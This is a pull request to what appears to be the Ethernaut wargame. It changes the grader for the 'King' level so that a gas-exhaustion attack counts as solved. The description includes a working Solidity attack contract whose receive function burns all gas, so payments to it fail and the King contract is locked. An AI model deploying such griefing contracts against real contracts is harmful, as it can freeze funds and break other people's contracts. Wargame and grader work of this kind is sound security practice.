### PR TITLE
Change `KingFactory.validateInstance` so that gas attack can be recognized

### DIFF
--- a/contracts/contracts/levels/KingFactory.sol
+++ b/contracts/contracts/levels/KingFactory.sol
@@ -18,7 +18,7 @@ contract KingFactory is Level {
   function validateInstance(address payable _instance, address _player) override public returns (bool) {
     _player;
     King instance = King(_instance);
-    (bool result,) = address(instance).call{value:0}("");
+    (bool result,) = address(instance).call.gas(21_000).value(0)("");
     !result;
     return instance._king() != address(this);
   }


### PR DESCRIPTION
I had an attack on `King` that wasn't recognized as a success:

```KingMeForever.sol
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.7.0;

contract KingMeForever {

    address payable public kingAddress = payable(0x86699f95700424A20eDf530041f3869480604aC9);
    bool public lastSuccess = true;
    bytes public data;

    function setKing(address payable kaddr) public {
      kingAddress = payable(kaddr);
    }
    
    constructor() public {
    }
    
    receive () external payable {
        while (gasleft() > 0) {
          uint derp = 8354893489501 * 12312312312;
        }
    }
    
    function bid() public payable {
        (lastSuccess, data) = kingAddress.call{ value: msg.value, gas: 10_000_000 }("");
    }
}
```

When I submitted the instance, the King contract just hung! (Gas attack FTW!)

This PR would fix `KingFactory.sol` to properly recognize a gas attack.